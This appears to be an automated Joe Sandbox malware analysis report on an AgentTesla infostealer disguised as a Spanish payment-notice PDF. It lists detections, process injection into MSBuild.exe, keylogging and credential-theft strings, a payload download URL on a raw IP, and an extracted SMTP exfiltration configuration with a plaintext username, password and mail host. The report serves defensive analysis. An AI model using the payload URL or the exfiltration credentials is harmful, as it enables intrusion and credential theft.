Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aviso de pago.pdf____________________________.exe

Overview

General Information

Sample Name:Aviso de pago.pdf____________________________.exe
Analysis ID:626184
MD5:05b6b97166b339557424ca035418a640
SHA1:e1699c9c10d6807650fcc35fc76c7744deeb16be
SHA256:6797c9eb17e1ad3b41121bc80db0a97ae642bfca0874c8b7bd391507d2ca5540
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Aviso de pago.pdf____________________________.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe" MD5: 05B6B97166B339557424CA035418A640)
    • cmd.exe (PID: 6360 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 15 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5836 cmdline: timeout 15 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • MSBuild.exe (PID: 3272 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "danny@permagraf.com.mx", "Password": "icui4cu2@@", "Host": "mail.permagraf.com.mx"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x2e6d4:$s1: get_kbok
                • 0x2f008:$s2: get_CHoo
                • 0x2fc63:$s3: set_passwordIsSet
                • 0x2e4d8:$s4: get_enableLog
                • 0x32b81:$s8: torbrowser
                • 0x3155d:$s10: logins
                • 0x30ed5:$s11: credential
                • 0x2d8c1:$g1: get_Clipboard
                • 0x2d8cf:$g2: get_Keyboard
                • 0x2d8dc:$g3: get_Password
                • 0x2eeb6:$g4: get_CtrlKeyDown
                • 0x2eec6:$g5: get_ShiftKeyDown
                • 0x2eed7:$g6: get_AltKeyDown
                12.0.MSBuild.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  12.0.MSBuild.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 26 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:195.133.18.171192.168.2.680497632848901 05/13/22-17:18:49.165848
                    SID:2848901
                    Source Port:80
                    Destination Port:49763
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 12.0.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "danny@permagraf.com.mx", "Password": "icui4cu2@@", "Host": "mail.permagraf.com.mx"}
                    Multi AV Scanner detection for submitted file
                    Source: Aviso de pago.pdf____________________________.exeReversingLabs: Detection: 24%
                    Antivirus detection for URL or domain
                    Source: http://195.133.18.171Avira URL Cloud: Label: malware
                    Source: http://195.133.18.171/Znmtganqo_Wvetpunc.jpgTAvira URL Cloud: Label: malware
                    Source: http://195.133.18.171/Znmtganqo_Wvetpunc.jpgAvira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URL
                    Source: http://195.133.18.171Virustotal: Detection: 17%Perma Link
                    Machine Learning detection for sample
                    Source: Aviso de pago.pdf____________________________.exeJoe Sandbox ML: detected
                    Source: 12.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 12.0.MSBuild.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                    Source: 12.0.MSBuild.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                    Source: 12.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 12.0.MSBuild.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                    Source: 12.0.MSBuild.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                    Source: Binary string: protobuf-net.pdbSHA256 source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 195.133.18.171:80 -> 192.168.2.6:49763
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                    Source: global trafficHTTP traffic detected: GET /Znmtganqo_Wvetpunc.jpg HTTP/1.1Host: 195.133.18.171Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 195.133.18.171 195.133.18.171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.18.171
                    Source: MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.133.18.171
                    Source: Aviso de pago.pdf____________________________.exeString found in binary or memory: http://195.133.18.171/Znmtganqo_Wvetpunc.jpg
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.133.18.171/Znmtganqo_Wvetpunc.jpgT
                    Source: MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://WPfLXV.com
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: global trafficHTTP traffic detected: GET /Znmtganqo_Wvetpunc.jpg HTTP/1.1Host: 195.133.18.171Connection: Keep-Alive

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Aviso de pago.pdf____________________________.exe
                    .NET source code contains very large array initializations
                    Source: 12.0.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bDDFF07F3u002dCE57u002d4C09u002dA970u002d38E9328FA8D8u007d/u0030BCA6C18u002d22C5u002d4E81u002dA07Eu002dD299400C5A1B.csLarge array initialization: .cctor: array initializer size 11790
                    Source: 12.2.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bDDFF07F3u002dCE57u002d4C09u002dA970u002d38E9328FA8D8u007d/u0030BCA6C18u002d22C5u002d4E81u002dA07Eu002dD299400C5A1B.csLarge array initialization: .cctor: array initializer size 11790
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_00E94A78
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_0496B5C0
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04968D68
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04962010
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04966868
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04963108
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04965280
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04965A18
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04966B10
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04962350
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_05998D36
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_05994300
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_048D0CB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_050346A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_05033D50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_05034672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_05034690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_05F26920
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_05F27538
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_05F290F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_05F26C68
                    Source: Aviso de pago.pdf____________________________.exeBinary or memory string: OriginalFilename vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearquajyuPCWUPvLWdHsfqSDDcyRGxRBVFTw.exe4 vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.486069682.00000000088AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearquajyuPCWUPvLWdHsfqSDDcyRGxRBVFTw.exe4 vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.482976208.00000000077E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: get_OriginalFilename vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.482115591.0000000006B50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNkrnkvsubxsztkgs.dll" vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000000.361902808.00000000005D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZnmtganqo.exe" vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearquajyuPCWUPvLWdHsfqSDDcyRGxRBVFTw.exe4 vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000003.468147986.0000000007EFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: get_OriginalFilename vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exeBinary or memory string: OriginalFilenameZnmtganqo.exe" vs Aviso de pago.pdf____________________________.exe
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeSection loaded: windows.staterepositoryps.dll
                    Source: Aviso de pago.pdf____________________________.exeReversingLabs: Detection: 24%
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe "C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe"
